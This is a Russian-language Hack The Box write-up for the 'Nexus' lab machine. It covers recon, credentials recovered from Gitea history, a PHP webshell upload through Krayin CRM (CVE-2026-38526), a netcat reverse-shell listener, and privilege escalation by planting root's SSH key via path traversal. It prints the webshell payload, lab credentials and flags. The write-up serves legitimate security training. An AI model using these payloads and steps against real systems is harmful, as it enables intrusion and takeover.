
# Разбор машины Hack The Box Nexus: разведка, обнаружение учётных данных Gitea, эксплуатация Krayin CRM через CVE-2026-38526, получение начального доступа и повышение привилегий через уязвимый сервис синхронизации шаблонов Gitea.
English 🇺🇸 | Español 🇪🇸
Nexus — это Linux-машина лёгкого уровня сложности с платформы Hack The Box, демонстрирующая многоэтапную цепочку атак, включающую перечисление виртуальных хостов, раскрытые учётные данные, уязвимый функционал веб-приложения, удалённое выполнение кода, повторное использование учётных данных и локальное повышение привилегий.
Разведка
│
▼
Перечисление виртуальных хостов
│
├── git.nexus.htb
└── billing.nexus.htb
│
▼
История коммитов Gitea
│
▼
Раскрытые учётные данные
│
▼
Вход в Krayin CRM
│
▼
CVE-2026-38526
│
▼
PHP-вебшелл
│
▼
Обратная оболочка
(www-data)
│
▼
Файл .env приложения
│
▼
SSH как jones
│
▼
gitea-template-sync
│
▼
Обход пути
│
▼
Вредоносный Git-репозиторий
│
▼
SSH как root
rootЦелевой IP: 10.129.82.92
nmap -p- -sV -sC -oN nexus_full_scan.txt 10.129.82.92
22/tcp open ssh OpenSSH 9.6p1 Ubuntu
80/tcp open http nginx 1.24.0 (Ubuntu)
gobuster vhost \
-u http://nexus.htb \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
--append-domain
git.nexus.htb → Gitea
billing.nexus.htb → Krayin CRM
Добавьте обнаруженные хосты в /etc/hosts:
echo "10.129.82.92 nexus.htb git.nexus.htb billing.nexus.htb" | sudo tee -a /etc/hosts
Перейдите по адресу:
http://git.nexus.htb
Репозиторий с именем:
admin/krayin-docker-setup
содержит полезную информацию в своей Git-истории.
Файл .env можно восстановить из предыдущих коммитов, что раскрывает учётные данные, которые больше не присутствуют в текущей версии.
| Сервис | Имя пользователя | Пароль |
|---|---|---|
| Krayin CRM | [email protected] | N27xh!!2ucY04 |
| Gitea | jones | N27xh!!2ucY04 |
Адрес электронной почты [email protected] также был обнаружен в разделе о сотрудниках на основном сайте.
URL: http://billing.nexus.htb/admin/login
Email: [email protected]
Password: N27xh!!2ucY04
Перейдите по адресу:
/admin/mail/sent
Затем:
Пейлоад хранится в:
exploits/CVE-2026-38526/shell.php
Пейлоад:
<?php system($_GET["cmd"]); ?>
Соответствующие multipart-поля:
Content-Disposition: form-data; name="attachments[]"; filename="shell.php"
Content-Type: application/x-php
После успешной загрузки:
http://billing.nexus.htb/storage/emails/2/shell.php?cmd=id
Ожидаемый результат:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Запустите слушатель:
nc -lvnp 4444
Затем запустите обратную оболочку через загруженный вебшелл.
Реализация на Python доступна по адресу:
exploits/CVE-2026-38526/reverse_shell.py
На этом этапе оболочка получена как:
www-data
Проверьте конфигурацию Krayin:
cat /var/www/krayin/.env
Обнаружены учётные данные:
DB_USERNAME=krayin
DB_PASSWORD=y27xb3ha!!74GbR
cat /etc/passwd | grep sh$
Обнаружена учётная запись jones.
Пароль:
y27xb3ha!!74GbR
f20cbf9aeb6bb228d356a42ff49c1933
systemctl list-units | grep -i gitea
Обнаружены следующие служба и таймер:
gitea-template-sync.timer
gitea-template-sync.service
Служба выполняется с повышенными привилегиями.
/etc/gitea/template-sync.py
Механизм синхронизации использует конструкцию путей, которую можно эксплуатировать через обход пути.
Сгенерируйте пару SSH-ключей:
ssh-keygen -t ed25519 -f /tmp/nexus_root -N ""
cat /tmp/nexus_root.pub
Эксплойт для манипуляции Git-объектами находится по адресу:
exploits/gitea_template_sync/exploit_git.py
Создайте репозиторий:
cd /tmp
rm -rf exploit
mkdir exploit
cd exploit
git init
python3 exploit_git.py
Репозиторий должен использовать ветку:
main
Сгенерируйте персональный токен доступа через:
http://git.nexus.htb
Перейдите по адресу:
Settings → Applications
Затем настройте удалённый репозиторий:
git remote set-url origin http://jones:[email protected]/jones/exploit.git
Отправьте вредоносный репозиторий:
git push -f origin main
Отслеживайте журнал синхронизации:
tail -f /var/log/template-sync.log
Успешная синхронизация приводит к обработке вредоносного Git-дерева привилегированной службой.
Пример:
[2026-08-27 02:01:30] Syncing template: jones/exploit
[2026-08-27 02:01:30] synced: ../../../../../root/.ssh/authorized_keys
[2026-08-27 02:01:30] Template sync complete
После записи открытого SSH-ключа в учётную запись root:
ssh -i /tmp/nexus_root [email protected]
Проверьте доступ:
whoami
Ожидаемый результат:
root
Получите root-флаг:
cat /root/root.txt
85be1d2a3084e387da0e7dd118908c63
| Флаг | Значение |
|---|---|
| User | f20cbf9aeb6bb228d356a42ff49c1933 |
| Root | 85be1d2a3084e387da0e7dd118908c63 |
Эти учётные данные принадлежат лабораторной среде Hack The Box, задокументированной в этом репозитории.
htb-labs-nexus/
├── README.md
├── exploits/
│ ├── CVE-2026-38526/
│ │ ├── shell.php
│ │ ├── reverse_shell.py
│ │ └── burp_request.txt
│ └── gitea_template_sync/
│ ├── exploit_git.py
│ ├── create_repo.sh
│ └── key.pub
├── scripts/
│ ├── linpeas.sh
│ ├── LinEnum.sh
│ └── enum_services.sh
├── assets/
│ ├── nmap_scan.txt
│ ├── gobuster_vhost.txt
│ └── credentials.txt
├── screenshots/
│ ├── gitea_repo.png
│ ├── crm_login.png
│ ├── webshell.png
│ └── root_flag.png
└── notes/
├── methodology.md
├── commands.md
└── credentials.md
Этот репозиторий предназначен только для образовательных целей и авторизованного тестирования безопасности.
Техники, учётные данные, эксплойты и команды, задокументированные здесь, не должны использоваться против систем без явного разрешения.
root, может стать вектором повышения привилегий.⭐ Если этот разбор оказался полезным, поставьте звёздочку репозиторию.
| Сервис | Имя пользователя | Пароль / Ключ |
|---|
| Krayin CRM | [email protected] | N27xh!!2ucY04 |
| Gitea | jones | N27xh!!2ucY04 |
| Токен Gitea | jones | 1dd7105bf7e57cad02c5a56af5d92703a7839364 |
| SSH | jones | y27xb3ha!!74GbR |
| SSH Root | root | /tmp/nexus_root |
| Инструмент | Назначение |
|---|
| Nmap | Перечисление портов и служб |
| Gobuster | Перечисление виртуальных хостов |
| Burp Suite | Перехват и модификация HTTP-запросов |
| Git | Анализ репозиториев и создание вредоносных репозиториев |
| Python 3 | Скрипты эксплуатации |
| Netcat | Слушатель обратной оболочки |
| LinEnum | Перечисление Linux |
| LinPEAS | Перечисление для повышения привилегий |
| SSH | Удалённый доступ |